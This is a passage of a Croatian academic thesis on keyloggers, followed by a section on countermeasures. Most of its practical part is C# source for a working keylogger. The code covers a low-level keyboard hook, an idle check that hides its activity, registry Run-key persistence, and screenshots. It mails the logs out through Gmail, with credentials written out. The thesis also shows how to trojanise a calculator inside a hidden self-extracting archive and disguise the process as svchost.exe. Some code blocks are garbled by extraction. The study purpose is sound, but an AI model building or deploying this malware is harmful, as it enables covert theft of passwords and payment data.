VK_CAPITAL = 0X14, //Caps-Lock
. . . .
VK_0 = 0X30,
VK_1 = 0X31,
VK_2 = 0X32,
VK_3 = 0X33,
. . . .
VK_A = 0X41,
VK_B = 0X42,
VK_C = 0X43,
VK_D = 0X44,
. . . .
VK_NUMPAD0 = 0X60,
VK_NUMPAD1 = 0X61,
VK_NUMPAD2 = 0X62,
VK_NUMPAD3 = 0X63,
. . . .
Funkcija CreateHook stvara low level windows hook koristeći već opisanu API metodu
SetWindowsHookEx() kojoj se prosljeĎuju redom sljedeći parametri:
- prvi parametar označava vrstu hook procedure koja se instalira (WH_KEYBOARD_LL)
- drugi parametar je pointer na hook proceduru
- treći parametar je handle modula trenutnog vlasnika hook procedure, a dobavljamo ga pozivom
funkcije GetModuleHandle()
- četvrti parametar je identifikator niti s kojom ţelimo asocirati hook proceduru, a postavljanjem
vrijednosti na nulu hook proceduru asociramo sa svim postojećim nitima.
public static void CreateHook(KeyHandler _kh)
{
}
Process _this = Process.GetCurrentProcess();
ProcessModule mod = _this.MainModule;
hd = HookFunc;
kh = _kh;
hhk = API.SetWindowsHookEx(13, hd, API.GetModuleHandle(mod.ModuleName), 0);
//13 - označava da se radi o WH_KEYBOARD_LL low-level hook-u
19

Slijedi definicija funkcije kojom uklanjamo hook proceduru iz hook lanca. To se postiţe
prosljeĎivanjem handlea hook procedure koju uklanjamo API funkciji
UnhookWindowsHookEx():
public static bool DestroyHook()
{
}
return API.UnhookWindowsHookEx(hhk);
public void OnTimedEvent(object source, ElapsedEventArgs e)
{
}
if (GetIdleTime() > 10000)
{
}
fastFlashWindow();
//printScreen();
//sendMail();
Sve akcije koje se izvode intervalno vide se upravo unutar ove metode, a dodavanje novih se
trivijalno svodi na dodavanje poziva pripadajućih funkcija.
5.3. Detekcija prisutnosti korisnika
Tijekom izvršavanja nekih od radnji keyloggera (slanje e-maila, slikanje ekrana, brzi prikaz
log datoteke...) postoji mogućnost trenutnog usporavanja sustava što korisniku moţe biti
sumnjivo. Da bi se izbjegla takva situacija implementirana je stalna provjera prisutnosti
korisnika za računalom.
Funkcije slanja e-maila i slikanja zaslona su automatizirane, odnosno izvršavaju se unutar
stalnih vremenskih intervala, stoga se pri svakom intervalu postavlja uvjet "mirovanja" (eng.
idle) kao uvjet za daljnje izvršavanje tih funkcija. Provjerom mirovanja se osigurava da
korisnik trenutno ne tipka na tipkovnici niti koristi miša. Time moţemo s velikom sigurnošću
ustvrditi da korisnik nije za računalom ili bar ne gleda u zaslon istog.
20

Programski kod započinje dodavanjem User32.dll datoteke i metode GetLastInputInfo kojoj
se prosljeĎuje ispod definirana struktura LASTINPUTINFO.
[DllImport("User32.dll")]
private static extern bool GetLastInputInfo(ref LASTINPUTINFO plii);
internal struct LASTINPUTINFO
{
}
public uint cbSize;
public uint dwTime;
Slijedi definicija funkcije GetIdleTime() koja računa vrijeme mirovanja i vraća ga kao
povratnu vrijednost. Vrijeme mirovanja se dobije oduzimanjem vremenske oznake posljednje
korisnikove akcije od trenutne vremenske oznake.
public static uint GetIdleTime()
{
}
LASTINPUTINFO lastInPut = new LASTINPUTINFO();
lastInPut.cbSize = (uint)System.Runtime.InteropServices
GetLastInputInfo(ref lastInPut);
.Marshal.SizeOf(lastInPut);
return ( (uint)Environment.TickCount - lastInPut.dwTime);
5.4. Skriveni izbornik
Pri pokretanju keylogger ne odaje svoju prisutnost korisniku. MeĎutim, pri unosu ključne
riječi ("fesb") glavni izbornik keyloggera se prikazuje (Slika 5.1.).
Iako keylogger samostalno vrši sve radnje u pozadini, unutar skrivenog izbornika su
ponuĎene opcije za ručno manipuliranje funkcionalnostima.
- Pokaţi log: klik mišem na ovo dugme u textbox kontroli prikaţe trenutni sadrţaj log
datoteke, odnosno do sada "uhvaćeni" tekst
- Pošalji log: šalje e-mail s log datotekom i uslikanim zaslonom (screenshot)
- Sakrij prozor: ponovno skriva izbornik od korisnika
- Bljesni!: prikazuje log datoteku unutar novog prozora u donjem desnom uglu ekrana
- Uslikaj!: uslika trenutno stanje na ekranu (screenshot)
- Ukloni reg. key: uklanja startup ključ iz registra
21

Slika 5.1. Skriveni izbornik keylogger aplikacije
5.5. Dodavanje u startup modifikacijom registra
Da bi se keylogger pokretao pri svakom paljenju računala potrebno je izvršiti modifikacije
unutar registra. Točnije, potrebno je dodati odgovarajući unos unutar Run lokacije u registru
(Slika 5.2.).
Sljedećim isječkom programskog koda prikazana je potrebna modifikacija.
String lokacija = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run";
RegistryKey rkApp = Registry.CurrentUser.OpenSubKey(lokacija, true);
if (rkApp.GetValue("Keylogger") == null)
{
}
rkApp.SetValue("Keylogger", Application.ExecutablePath.ToString());
Opis programskog koda:
Unutar varijable lokacija sprema se putanja do mjesta u registru kojeg treba modificirati, a
zatim se ta lokacija otvara za upis. Provjerava se da li je modifikacija već napravljena,
odnosno da li je vrijednost "Keylogger" unesena i ovisno o tome nastavlja se s daljnjom
modifikacijom.
22

5.6. Screenshot
Slika 5.2. Sadržaj run registra nakon modifikacije
Ovaj keylogger ima mogućnost hvatanja stanja na ekranu u obliku slike u jpeg formatu. Ta
funkcionalnost je omogućena funkcijom printScreen() čije se izvoĎenje moţe pozvati s bilo
kojeg mjesta u programskom kodu.
public void printScreen()
{
}
Bitmap printscreen = new Bitmap(Screen.PrimaryScreen.Bounds.Width,
Screen.PrimaryScreen.Bounds.Height);
Graphics graphics = Graphics.FromImage(printscreen as Image);
graphics.CopyFromScreen(0, 0, 0, 0, printscreen.Size);
printscreen.Save("printscreen.jpg", ImageFormat.Jpeg);
Stvara se novi bitmap objekt printscreen veličine zaslona, što u biti predstavlja sliku. Nadalje,
od te slike se stvara graphic objekt graphics. Tek tada se "hvata" sadrţaj ekrana i sprema u
obliku jpeg slike imena "printscreen.jpg".
5.7. Spremanje podataka
Praćenje pritisnutih tipki se naposljetku svodi na spremanje podataka u log datoteku. Log
datoteka moţe biti enkriptirana te sakrivena bilo gdje na disku zaraţenog računala. U ovom
23

slučaju podatke spremamo unutar neenkriptirane tekstualne datoteke log.tmp koja se nalazi
gdje i izvršna datoteka keyloggera.
Slijedi isječak programskog koda koji omogućava spremanje pritisnutih tipki s tipkovnice
unutar tekstualne datoteke (log datoteka). Pri svakom pokretanju keylogger aplikacije
potrebno je izvršiti provjeru da li log datoteka postoji na specificiranom mjestu u disku.
Ako datoteka ne postoji, potrebno ju je stvoriti. Provjeru vršimo koristeći metodu
System.IO.File.Exists() koja provjerava postojanje datoteke, a metodom File.Create()
stvaramo istu.
if (System.IO.File.Exists("log.tmp") == false)
{
}
File.Create("log.tmp");
Kako je već opisano, svaki pritisak tipke na tipkovnici generira jedinstveni virtualni kod.
Vrijednost virtualnog koda uvjetuje koji je znak korisnik utipkao, odnosno koji će se znak
upisati u log datoteku. Varijabla temp označava trenutno utipkani znak koji se sprema. Slijedi
switch naredba koja u ovisnosti o virtualnom kodu varijabli temp dodjeljuje odreĎenu
vrijednost.
switch (vk)
{
}
case Hook.VK.VK_NUMPAD0: temp = "0";
break;
case Hook.VK.VK_NUMPAD1: temp = "1";
break;
. . .
case Hook.VK.VK_Q: temp = "q";
break;
case Hook.VK.VK_W: temp = "w";
break;
case Hook.VK.VK_E: temp = "e";
break;
. . .
default: break;
24

Samo spremanje u log datoteku se vrši prosljeĎivanjem varijable temp metodi writeToFile -
writeToFile(temp). Definicija metode writeToFile() je dana sljedećim programskim kodom:
public void writeToFile(String writing)
{
}
TextReader tr = new StreamReader("log.tmp");
String tmp = tr.ReadToEnd();
tr.Close();
TextWriter tw = new StreamWriter("log.tmp");
tw.Write(tmp + writing);
tw.Close();
Datoteku log.tmp je potrebno prvo pročitati, to se izvodi pomoću streamreadera i pozivom
metode ReadToEnd(). Sadrţaj log datoteke se sprema unutar varijable tmp. Zatim slijedi
pisanje u datoteku log.tmp, a to se izvodi pomoću streamwritera i pozivom metode Write(). U
log datoteku se ovog puta upisuje cijeli trenutni sadrţaj iste (tmp) uz dodatak utipkanog znaka
(varijabla temp koja je prosljeĎena metodi).
5.8. Slanje log datoteke e-mailom
Slanje log datoteke i slike zaslona moţe se vršiti na više načina od kojih su najčešće: slanje na
FTP server i slanje e-mailom. U ovoj keylogger aplikaciji koristit ćemo e-mail metodu. U tu
svrhu pišemo zasebnu funkciju sendMail() koja vrši slanje maila. Funkcija se moţe pozivati
sa bilo kojeg mjesta u programskom kodu.
public void sendMail()
{
TextReader tr = new StreamReader("log.tmp");
String subjectTxt = tr.ReadToEnd();
MailMessage message = new MailMessage("keylog.fesb@gmail.com",
"keylog.fesb@gmail.com", "Log file", subjectTxt);
SmtpClient emailClient = new SmtpClient("smtp.gmail.com", 587);
System.Net.NetworkCredential SMTPUserInfo = new
System.Net.NetworkCredential("keylog.fesb", "keylogfesbpass");
System.Net.Mail.Attachment attachment;
attachment = new System.Net.Mail.Attachment("printscreen.jpg");
message.Attachments.Add(attachment);
25

}
emailClient.UseDefaultCredentials = false;
emailClient.Credentials = SMTPUserInfo;
emailClient.EnableSsl = true;
emailClient.Send(message);
tr.Close();
Opis programskog koda:
Prvo otvaramo log datoteku pomoću metode StreamReader te njen sadrţaj stavljamo u
varijablu subjectTxt. Nadalje, pomoću metode MailMessage unosimo e-mail adresu
pošiljatelja i primatelja, a u našem slučaju to je ista adresa - keylog.fesb@gmail.com
Koristimo Gmail servis za slanje e-maila stoga slijedi unos odgovarajućih podataka
korištenjem metoda System.Net.Mail.SmtpClient() i System.Net.NetworkCredential():
smtp server: smtp.gmail.com
port: 587
korisničko ime: keylog.fesb
lozinka: keylogfesbpass
Screenshot sliku postavljamo kao privitak (eng. attachment), a to postiţemo metodom
System.Net.Mail.Attachment() prosljeĎujući joj ime slike – "printscreen.jpg". Završno slanje
e-maila vrši emailClient.Send() metoda.
5.9. Brzi prikaz log datoteke
Kako je već opisano jedna od metoda dohvata pritisnutih tipki je metoda optičkog nadziranja.
Ta metoda nije česta zbog očitih fizičkih ograničenja ali njenim predstavljanjem u ovom
diplomskom radu pokušat će se dočarati mnogobrojnost mogućih metoda koja je ograničena
samo domišljatošću njihovih tvoraca.
Pretpostavka je da se vrši nekakav optički nadzor nad računalom. Kako je već opisano, vrši se
detekcija prisutnosti korisnika i kada se korisnik udalji od računala cilj je na kratko prikazati
njegove unose, odnosno log file. Ovdje se ţeli iskoristiti činjenica da brzi prikaz log datoteke
(~50ms) nije vidljiv korisniku, ali se moţe detektirati korištenom nadzornom opremom (npr.
kamera s teleobjektivom).
26

Prvo je potrebno definirati novu formu unutar koje će biti tekst log datoteke:
public Form2()
{
}
InitializeComponent();
box = textBox1;
TextReader tr = new StreamReader("log.tmp");
string loggedText = tr.ReadToEnd();
tr.Close();
textBox1.Text = loggedText;
Po svojoj inicijalizaciji forma korištenjem streamreadera otvara log datoteku "log.tmp" i čita
njen sadrţaj funkcijom ReadToEnd(). Na kraju se pročitani tekst loggedText ispisuje unutar
textBox kontrole.
Slijedi programski kod funkcije fastFlashWindow() koja omogućava kratki prikaz log
datoteke:
public void fastFlashWindow()
{
}
Form2 Form2 = new Form2();
Form2.StartPosition = FormStartPosition.Manual;
Rectangle workingArea = SystemInformation.WorkingArea;
Point nLocation = new Point(workingArea.Width - Form2.Width,
workingArea.Height - Form2.Height);
Form2.Location = nLocation;
Form2.ShowInTaskbar = false;
Form2.Visible = true;
Form2.Show();
form = Form2;
form.box.Select(0, 0);
System.Timers.Timer aTimer = new System.Timers.Timer();
aTimer.Elapsed += new
System.Timers.ElapsedEventHandler(aTimer_Elapsed);
aTimer.Interval = 75;
aTimer.Enabled = true;
27

Opis programskog koda:
Tekst će biti prikazan unutar novostvorene forme Form2. Pozicija nove forme će uvijek biti u
donjem desnom uglu radne površine. Ta pozicija (točka) se računa oduzimanjem širine i
visine forme od širine i visine radne površine te smješta unutar varijable nLocation. Nova
pozicija forme se vrši postavljanjem atributa Location na novu vrijednost nLocation. Zatim se
stvara nova štoperica aTimer koja nakon specificiranog vremena (u milisekundama) skriva
formu. Nakon izvršavanja ovog koda dobije se ţeljeni rezultat, odnosno kratak prikaz
(bljesak) nove forme unutar koje se nalazi sadrţaj log datoteke.
5.10. Infekcija keyloggerom
Osnova svakog keyloggera je potajan rad. S time na umu koriste se razne metode potajne
infekcije ţrtvinog računala.
Naša metoda koristi zasebnu legitimnu aplikaciju čijim se pokretanjem potajno vrši kopiranje
keylogger aplikacije na disk i njeno dodavanje u startup registar što pak znači pokretanje
keyloggera sa svakim sljedećim paljenjem računala. U ovom primjeru korištena je open
source aplikacija PC_Calculator (Slika 5.3.) koja pruţa sve funkcionalnosti jednostavnog
kalkulatora [12].
Slika 5.3. Sučelje aplikacije PC_Calculator
28

Dakle, potrebno je modificirati programski kod aplikacije PC_Calculator tako da pri
pokretanju izvrši kopiranje keyloggera na računalo i modifikaciju registra. Sljedeći isječak
programskog koda vrši potrebne radnje:
String lokacija = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run";
RegistryKey rkApp = Registry.CurrentUser.OpenSubKey(lokacija, true);
public frmCalculator()
{
. . .
InitializeComponent();
if (System.IO.File.Exists(@"D:\test\MojKeylogger.exe") == false)
{
File.Copy("MojKeylogger.exe", @"D:\test\MojKeylogger.exe");
}
if (rkApp.GetValue("Keylogger") == null)
{
}
rkApp.SetValue("Keylogger", @"D:\test\MojKeylogger.exe");
Opis programskog koda:
Lokacija Run unutar registra se otvara i poistovjećuje s varijablom rkApp. Slijedi kopiranje
keylogger aplikacije na disk pomoću metode File.Copy(). Zatim se vrši potrebna modifikacija
registra pozivom SetValue() metode.
Ova metoda infekcije podrazumijeva da se PC_Calculator i keylogger aplikacija nalaze na
istoj memorijskoj lokaciji. Kako se svaka aplikacija nalazi unutar svoje izvršne datoteke
korisnik moţe opaziti zloćudnu narav aplikacije. Cilj je stoga obe aplikacije smjestiti unutar
jedne izvršne datoteke čijim se pokretanjem od strane korisnika neprimjetno izvršava poviše
opisani proces infekcije, odnosno vidljivo pokretanje kalkulatora i pozadinsko kopiranje
keyloggera i modifikacija registra. U tu svrhu koristi se aplikacija WinRAR za stvaranje
samoraspakiravajuće SFX arhive (eng. self-extracting archive).
Na Slici 5.4. prikazan je postupak stvaranja SFX arhive:
- Korak 1: Specificira se ime konačne datoteke i označava stavka Create SFX archive
- Korak 2: Pod stavkom Advanced pristupa se SFX opcijama (SFX options)
- Korak 3: Specificira se koja će aplikacija unutar arhive biti pokrenuta
- Korak 4: Označava se opcija Unpack to temporary folder tako da sadrţaj arhive pri
njenom pokretanju ne ostane na lokalnom disku. TakoĎer se označava opcija Hide all
tako da cijeli proces pokretanja arhive bude skriven od korisnika.
29

Slika 5.4. Postupak stvaranja SFX arhive (koraci 1-4)
Krajnji rezultat ovog postupka je izvršna datoteka imena PC_Calculator.exe čijim se
otvaranjem pokreće kalkulator, a u pozadini vrši infekcija računala keyloggerom.
5.11. Primjena keyloggera
U ovom potpoglavlju bit će opisan način upotrebe keyloggera. Bit će prikazani svi koraci od
hvatanja i spremanja pritisnutih tipki i slike radne površine do slanja podataka napadaču
(mailom i brzim prikazom na ekranu). Nakon uspješne infekcije računala keylogger aplikacija
će se pokretati pri svakom pokretanju sustava. Aplikacija nije vidljiva korisniku i njena
prisutnost se moţe očitovati samo unutar Windows Task Managera gdje se nalazi kao jedan
od niza pokrenutih procesa. Aplikaciji moţemo dati bilo koje ime da maskiramo njenu
stvarnu narav, na primjer svchost.exe (Slika 5.4.). Ime našeg keyloggera je u testne svrhe
MojKeylogger.exe.
30

Slika 5.4. Vidljivost keylogger aplikacije unutar Task Managera
U ovom trenutku aplikacija je spremna za samostalan rad. Sve što korisnik utipka na
tipkovnici bit će registrirano i pohranjeno u log datoteku. Napadaču je cilj zabiljeţiti
povjerljive podatke kao što su korisničko ime, lozinka, brojevi kreditnih kartica itd.
Na Slikama 5.5. i 5.6. su prikazana dva scenarija u kojima korisnik unosi povjerljive podatke,
a kao rezultat se dobije log datoteka s "uhvaćenim" podacima.
- Scenarij 1: Korisnik pristupa svom Gmail korisničkom računu unoseći svoje korisničko
ime i lozinku. Iako je lozinka pri unosu maskirana keylogger bez problema detektira
lozinku i sprema je u log datoteku (Slika 5.5).
Slika 5.5. Pristupanje internet servisu i rezultirajuća log datoteka
- Scenarij 2: Korisnik vrši plaćanje preko interneta i unosi povjerljive podatke kao što su
ime, prezime, broj kreditne kartice, CVV broj, adresa i broj telefona (Slika 5.6.). Kako
je na korisnikovom računalu instaliran keylogger sve unesene informacije su
zabiljeţene u log datoteci (Slika 5.7.).
31

Slika 5.6. Korisnik unosi podatke pri Internet kupovini
Slika 5.7. Log datoteka nakon korisnikovog unosa
Nakon nekog vremenskog intervala (npr. svakih deset minuta) vrši se detekcija prisutnosti
korisnika i slanje log datoteke e-mailom. TakoĎer, u slučaju odsutnosti korisnika vrši se brzi
prikaz log datoteke na ekranu (Slika 5.8.).
Slika 5.8. Brzi prikaz log datoteke u trajanju od 50ms
32

Kako je već opisano šalje se e-mail i unutar njega se nalazi sadrţaj log datoteke i slika
korisnikove radne površine (Slika 5.9.).
Slika 5.9. E-mail poslan napadaču - sadržaj log datoteke
i slika žrtvine radne površine
33

6. ZAŠTITA OD KEYLOGGERA
Anti-spyware
Anti-spyware je software posebno napravljen za detekciju keyloggera (malware-a). Radi na
principu skeniranja datoteka i usporeĎivanja s vlastitom bazom poznatog malware-a. Baza
sadrţi programske karakteristike (eng. signature) svih poznatih zlonamjernih datoteka i
kontinuirano se aţurira. Moţe se reći da je glavni uvjet za detekciju zlonamjerne datoteke
postojanje njene programske karakteristike unutar baze podataka. Stoga, takvi programi nisu
učinkoviti u borbi protiv keyloggera jer postoji znatan vremenski period izmeĎu pojavljivanja
novog malware-a i rezultirajućeg aţuriranja baze novom programskom karakteristikom.
Virtualna tipkovnica
Najčešća mjera zaštite protiv keyloggera je korištenje virtualne tipkovnice koja se iscrtava na
ekranu (Slika 6.1.). Umjesto pritiska tipke na stvarnoj tipkovnici korisnik mišem odabire znak
s virtualne tipkovnice. Postoje različite implementacije ovakve zaštite uključujući "lebdjenje"
iznad ţeljene tipke, nasumično mijenjanje rasporeda tipki, itd.
Ovakvu vrstu zaštite je vrlo lako zaobići korištenjem "hvatanja" slike na zaslonu (eng.
screenshot). Umjesto praćenja unosa utipkanih znakova napadač pri svakom kliku mišem
hvata prostor oko kursora. Time napadač dobije sliku svakog znaka kojeg je korisnik odabrao.
Password manageri
Slika 6.1. Virtualna tipkovnica
Umjesto unošenja lozinki i drugih povjerljivih podataka direktno u web formu, koristi se
software koji automatski popunjava polja na formi točnim podacima.
34

Zaštita takvim programima se lako moţe zaobići korištenjem keyloggera koji se smještaju
unutar Internet preglednika (eng. browser). Na taj način keylogger moţe pročitati povjerljive
podatke pri njihovom unosu u formu. Keyloggeri koji se smještaju unutar Internet preglednika
zovu se man-in-the-browser malware i najčešće se maskiraju kao legitimni plug-in.
Dinamika unosa znakova
Dinamika unosa znakova promatra način na koji korisnik unosi znakove. Točnije, dinamika
unosa mjeri dvije različite vrijednosti:
- vrijeme zadrţavanja (eng. dwell time) - vrijednost koja označava vrijeme provedeno
drţeći tipku pritisnutom
- vrijeme izmjene (eng. flight time) - vrijednost koja označava vrijeme potrebno korisniku
da pritisne sljedeću tipku
Istraţivanje je pokazalo da svaki korisnik ima svoju jedinstvenu dinamiku unosa te da se ova
metoda lako moţe koristiti pri identifikaciji. Ova metoda predstavlja dobar način zaštite s
obzirom da većina keyloggera ne implementira njeno zaobilaţenje. MeĎutim, ovakav način
zaštite je moguće zaobići korištenjem keyloggera koji osim praćenja unosa takoĎer prati i
vrijeme zadrţavanja i vrijeme izmjene. Tada napadač, pretvarajući se da je legitiman korisnik,
pri unosu podataka koristi jednaku dinamiku unosa kao i ţrtva.
Jednokratne lozinke
Primjena jednokratnih lozinki (eng. one time password) znači korištenje drugačije lozinke pri
svakom sljedećem pristupanju sustavu. Korisnik dobiva trenutnu lozinku najčešće koristeći
zasebni ureĎaj koji generira novu lozinku pri svakom upitu ili pak nakon nekog vremenskog
intervala.
Ovakav način zaštite teoretski uvijek blokira neovlašten pristup. Ako keylogger dohvati
lozinku pri korisnikovom prijavljivanju napadač ne moţe iskoristiti tu lozinku za neovlašten
pristup jer ista više ne vrijedi. MeĎutim, napadač moţe izvesti sljedeću vrstu napada: kada
korisnik (ţrtva) pokuša ostvariti pristup svom računu keylogger unesenu jednokratnu lozinku
odmah pošalje napadaču te zaustavi korisnikovu autentifikaciju bilo odugovlačenjem veze ili
javljanjem greške javljajući korisniku da ponovi postupak. Istovremeno, napadač koristi
primljenu lozinku i autentificira se kao ţrtva.
35

Enkripcija unosa
Enkripcija unosa znakova sa tipkovnice predstavlja najefektivniju metodu zaštite od
keyloggera. Cilj ove metode je enkriptirati pritisnute znakove na nivou drivera tipkovnice. Na
taj način znakovi se enkriptiraju pri samom unosu te bilo kakav pokušaj dohvata istih rezultira
neupotrebljivim podacima. Dekripcija znakova se vrši unutar mreţnog sloja i prije njihovog
ulaska u Internet preglednik (izbjegavanje man-in-the-middle napada).
36

7. ZAKLJUČAK
U okviru ovog diplomskog rada obraĎena je problematika narušavanja privatnosti i sigurnosti
korisnika računalnih sustava. Kako teoretski tako i praktično predstavljen je slučaj napada
keyloggerom, malicioznim softverom koji potajno prati korisnikove unose znakova. Uz opis
vrsta keyloggera opisan je i sam princip njihovog rada, kao i osnovni programski mehanizam
Windows Hooks koji omogućuje njihovu glavnu funkcionalnost - praćenje unosa znakova sa
tipkovnice. Problem postojanja keyloggera nije zanemariv, to više što napadač sa samo
osnovnim znanjem programiranja moţe napraviti keylogger koji je u stanju kompromitirati
korisnikovu privatnost i sigurnost te dovesti do neţeljenih posljedica (npr. gubitak novca s
bankovnog računa). U praktičnom dijelu ovog rada dan je postupak izrade keylogger
aplikacije unutar koje su implementirane osnovne funkcionalnosti i metode napada.
Budući da se ljudi sve više oslanjaju na računala u svakodnevnom ţivotu potrebno je biti
svjestan postojanja ovakvog malicioznog softvera koji moţe napraviti materijalnu i
emocionalnu štetu, te je preporučljivo poduzeti neke od mjera zaštite predstavljenih u ovom
diplomskom radu.
37

8. LITERATURA
[1] Skupina autora: "Malware", s Interneta, http://en.wikipedia.org/wiki/Malware
[2] Baloch, R.: "An Introduction To Keyloggers, RATS, And Malware", e-knjiga, 2011.
[3] Seltzer L.: "The Growth of Malware: Up, Up, and Away", s Interneta,
http://blogs.pcmag.com/securitywatch/2009/07/the_growth_of_malware_up_up_an.php
[4] Skupina autora: "Bankarski zloćudni programi", CARNet
[5] Aycock, J.: "Spyware and Adware (Advances in Information Security)", Springer, New
York, 2010.
[6] Skupina autora: "Keystroke logging", s Interneta,
http://en.wikipedia.org/wiki/Keystroke_logging
[7] Kelly, A.: "Cracking Passwords using Keyboard Acoustics and Language Modelling", s
Interneta, http://www.inf.ed.ac.uk/publications/thesis/online/IM100855.pdf
[8] Grebennikov N.: " Keyloggers: How they work and how to detect them", s Interneta,
http://www.securelist.com/en/analysis?pubid=204791931
[9] Skupina autora: "Hooks Overview", Microsoft, s Interneta,
http://msdn.microsoft.com/en-us/library/ms644959
[10] Skupina autora: "SetWindowsHookEx Function", Microsoft, s Interneta,
http://msdn.microsoft.com/en-us/library/ms644990
[11] Burrows, E.: "Low-level Windows API hooks from C# to stop unwanted keystrokes", s Interneta,
http://www.codeproject.com/KB/system/CSLLKeyboard.aspx
[12] PsychoCoder: "Basic Calculator in C#", s Interneta,
http://www.dreamincode.net/forums/topic/32968-basic-calculator-in-c/
38